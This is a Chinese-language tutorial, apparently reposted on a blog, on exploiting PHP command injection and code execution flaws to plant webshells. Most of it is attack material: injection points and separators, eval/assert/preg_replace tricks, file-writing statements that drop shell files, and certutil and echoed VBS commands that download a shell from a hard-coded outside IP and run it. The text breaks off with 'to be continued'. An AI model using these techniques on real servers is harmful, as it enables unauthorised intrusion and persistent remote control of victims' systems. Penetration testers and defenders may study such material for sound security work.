通过代码执行或命令执行写Shell

原创 用友财务软件  2022-08-30 14:30:47  阅读 315 次 评论 0 条
摘要:

本文主要讲述命令执行写shell,`搜索公众号:白帽子左一,每天更新技术干货!PHP一.命令执行命令执行(注入)常见可控位置情况有下面几种:system("$arg");//可控点直接是待执行的...

 `搜索公众号:白帽子左一,每天更新技术干货!
PHP 一.命令执行

命令执行(注入)常见可控位置情况有下面几种:

system("$arg"); //可控点直接是待执行的程序

如果我们能直接控制$arg,那么就能执行执行任意命令了。

system("/bin/prog $arg"); //可控点是传入程序的整个参数

我们能够控制的点是程序的整个参数,我们可以直接用&& || 或 | 等等,利用与、或、管道命令来执行其他命令(可以涉及到很多linux命令行技巧)。

system("/bin/prog -p $arg"); //可控点是传入程序的某个参数的值(无引号包裹)

我们控制的点是一个参数,我们也同样可以利用与、或、管道来执行其他命令,情境与二无异。

system("/bin/prog -p=\"$arg\"");//可控点是传入程序的某个参数的值(有双引号包裹)

这种情况压力大一点,有双引号包裹。

如果引号没有被转义,我们可以先闭合引号,成为第三种情况后按照第三种情况来利用,如果引号被转义(addslashes)、我们也不必着急。

linux shell 环境下双引号中间的变量也是可以被解析的,我们可以在双引号内利用反引号执行任意命令 id

system("/bin/prog --p='$arg'"); //可控点是传入程序的某个参数的值(有单引号包裹)

这是最困难的一种情况

因为单引号内只是一个字符串,我们要先闭合单引号才可以执行命令。

如:system(“/bin/prog –p=’aaa’ | id”)

在漏洞检测中,除了有回显的命令注入(比如执行dir 命令或者cat 读取系统文件);

还可以使用盲打的方式,比如curl远程机器的某个目录(看access.log),或者通过dns解析的方式获取到漏洞机器发出的请求。

当我们确定了OS命令注入漏洞后,通常可以执行一些初始命令来获取有关受到破坏的系统的信息。

以下是在Linux和Windows平台上常用的一些命令的摘要:

在这里插入图片描述

命令分隔符
在Linux上, ; 可以用 |、|| 代替

前面的执行完执行后面的



|是管道符,显示后面的执行结果



||当前面的执行出错时执行后面的



可用**%0A和 \n**换行执行命令

在Windows上,不能用 ; 可以用&、&&、|、||代替

&前面的语句为假则直接执行后面的



&&前面的语句为假则直接出错,后面的也不执行



|直接执行后面的语句



||前面出错执行后面的

PHP 支持一个执行运算符:反引号(``) PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回

效果与函数 shell_exec() 相同,都是以字符串的形式返回一个命令的执行结果,可以保存到变量中

二.代码执行

此处以php为例,其它语言也存在这类利用。

(1) preg_replace()函数:

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [,int $limit =-1[,int&$count ]])

p a t t e r n 处 存 在 e 修 饰 符 时 , pattern处存在e修饰符时, patternereplacement 会被当做php代码执行。

(2)mixed call_user_func( callable $callbank [ , mixed $parameter [ , mixed
$…):

第一个参数为回调函数,第二个参数是回调函数的参数

图片

图片

(3)eval()和assert():

当assert()的参数为字符串时 可执行PHP代码

【区分】:

eval(" phpinfo(); ");【√】eval(" phpinfo() ");【X】

assert(" phpinfo(); ");【√】assert(" phpinfo() ");【√】
三.反序列化

php反序列化导致RCE的原理及利用,参考专题文章: 反序列化漏洞汇总

四.通过代码执行或命令执行写shell

代码执行写shell

当遇到一个可以代码执行的位置时,我们可以通过写webshell来进行进一步渗透

1.file_put_contents函数

file_put_contents函数格式为file_put_contents(filename,data)

指定写入文件名和写入文件的数据

可以通过这个函数去写入数据

这里用了网上的漏洞测试的平台

测试语句为:

file_put_contents('gt.php','');

图片

访问文件

图片

2.fopen() 创建文件函数

fopen函数,格式为fopen(filename,mode) 前面是文件名,后面是规定要求到该文件/流的访问类型

它的作用是打开文件或url,这里当后续命令为w,或W+ 时,当文件不存在的话就会新建一个文件
然后再用fwrite去写入数据

fwrite()写入文件函数,格式为fwrite(file,string),这里file是文件名,string是写入的字符串

这里注意如果是通过assert函数去代码执行,那么只允许一条语句去执行

这里可以把两个命令写一起

例如

fwrite(fopen('z23.php','a'),'');

执行效果如下

执行语句

fwrite(fopen('z23.php','a'),'');

图片

访问文件

图片

3.fputs函数

Fputs函数也是php里一个用于写入文件的函数,它其实是fwrite的别名

基本用法和fwrite一样

测试语句为

fputs(fopen('tk.php','w'),'');

执行语句

fputs(fopen('tk.php','w'),'');

图片

访问文件

图片

4.通过执行命令执行函数去写shell

通过代码执行漏洞去执行代码脚本调用操作系统命令

常用函数有

system()

exec()

shell_exec()

passthru()

pcntl_exec()

popen()

proc_open()

这里我们只挑选其中部分来测试,其他的道理差不多

4.1、首先为system()

测试语句为

system(' echo "" >pp.php ');

图片

然后访问文件测试下

图片

测试完成

4.2、exec()函数

测试语句如下

exec(' echo "" >ppl.php ');

在本地执行下

图片

访问生成文件

图片

4.3、shell_exec()函数

测试语句为

shell_exec(' echo "" >ppk.php ');

在本地执行测试

图片

访问生成文件

图片

4.4、passthru()函数

测试语句为

passthru(' echo "" >ppm.php ');

在本地测试

图片

访问生成文件

图片

命令执行写webshell

通过cmd命令去写入

通过cmd里的echo去写入webshell

命令如下

echo "">223.php

执行如下

图片

返回页面如下

图片

访问223.php

图片

通过命令执行去远程下载shell

利用windows的certutil命令
例:

certutil -urlcache -split -f http://129.211.169.121/123.php

通过windows的certutil去在外部下载文件

这个certutil是windows系统上预装的工具,一般用于校验md5,sha1,sha256,下载文件

执行这个需要相当高的权限,

在搭建的服务器上安装好环境

在本地测试一下

执行命令

certutil -urlcache -split -f http://129.211.169.121/123.php

图片

得到结果

图片

得到返回文件

图片

访问效果如下

图片

通过vbs去建立脚本去下载

vbs是基于visual Basic的脚本语言,一般windows设备自带

这里我们通过命令执行去写入脚本,然后再通过命令执行去下载shell

测试脚本如下

Set args =Wscript.Arguments

Url="http://129.211.169.121/1234.php"

dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")

dim bStrm:Set bStrm = createobject("Adodb.Stream")

xHttp.Open"GET",Url,False

xHttp.Send

with bStrm

.type =1

.open

.write xHttp.responseBody

.savetofile "12345.php",2

endwith

先再远程机器上设立一个php文件名为1234.php
内容为

为什么要这样写呢?

这个脚本是直接读取远程机器上的文件信息然后写入到一个文件里,我们通过读取这个php页面显示的语句去获得shell内容

然后我们在页面里去写入vbs文件,这里脚本内容过长,且有换行,我们通过echo 一条条写入命令,和前面命令执行写shell一样

echo Set args =Wscript.Arguments> xxx.vbs



echo Url="http://129.211.169.121/1234.php">>xxx.vbs



echo dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")>>xxx.vbs



echo dim bStrm:Set bStrm = createobject("Adodb.Stream")>>xxx.vbs



echo xHttp.Open"GET",Url,False>>xxx.vbs



echo xHttp.Send>>xxx.vbs



echo with bStrm >>xxx.vbs



echo .type =1>>xxx.vbs



echo .open >>xxx.vbs



echo .write xHttp.responseBody >>xxx.vbs



echo .savetofile "12345.php",2>>xxx.vbs



echo endwith>>xxx.vbs

后续内容通过>> 换行写入

得到xxx.vbs文件

在这里插入图片描述

然后在存在命令执行处执行命令去下载文件

执行命令 start wscript -e:vbs xxx.vbs

图片

然后得到文件

图片

去访问

图片

未完待续…

在这里插入图片描述


在这里插入图片描述

本文地址:https://www.ufidawhy.com/shujuku/120085.html
版权声明:本文来源于网络,如有侵权请E-mail联系 ufidawhy 站长 ufidawhy@vip.qq.com!

评论已关闭!